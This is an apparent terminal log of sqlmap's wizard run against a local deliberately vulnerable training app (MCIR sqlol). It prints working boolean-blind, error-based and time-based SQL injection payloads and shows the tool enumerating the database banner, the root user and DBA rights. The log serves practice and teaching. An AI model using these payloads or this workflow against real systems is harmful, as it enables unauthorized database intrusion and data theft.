triximap

root@kali:~# sqlmap -u "http://127.0.0.1/mcir/sqlol/challenges/challenge0.php" --wizard
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.2.12.16#dev}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:22:15 /2018-12-15/

[14:22:15] [INFO] starting wizard interface
POST data (--data) [Enter for None]:
[14:22:23] [WARNING] no GET and/or POST parameter(s) found for testing (e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). Will search for forms
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 1

sqlmap is running, please wait..

[#1] form:
GET http://127.0.0.1/mcir/sqlol/select.php?query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=&submit=Inject!
do you want to test this form? [Y/n/q]
> Y
Edit GET data [default: query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=&submit=Inject!]: query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=&submit=Inject!
do you want to fill blank fields with random values? [Y/n] Y
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
GET parameter 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 851 HTTP(s) requests:
---
Parameter: inject_string (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=PnBM' OR NOT 7863=7863#&submit=Inject!

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=PnBM' AND (SELECT 2442 FROM(SELECT COUNT(*),CONCAT(0x716a6a6b71,(SELECT (ELT(2442=2442,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RmtU&submit=Inject!

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: query_results=all_rows&error_level=verbose&show_query=on&location=where_string&inject_string=PnBM' OR SLEEP(5)-- NQku&submit=Inject!
---
do you want to exploit this SQL injection? [Y/n] Y
[14:23:27] [INFO] retrieved: 10.1.37-MariaDB-1
web server operating system: Linux Debian
web application technology: Apache 2.4.37
back-end DBMS: MySQL >= 5.0
banner:    '10.1.37-MariaDB-1'
[14:23:27] [INFO] retrieved: root@localhost
current user:    'root@localhost'
[14:23:27] [INFO] retrieved: sqlol
current database:    'sqlol'
current user is DBA:    True

[*] ending @ 14:23:27 /2018-12-15/

root@kali:~#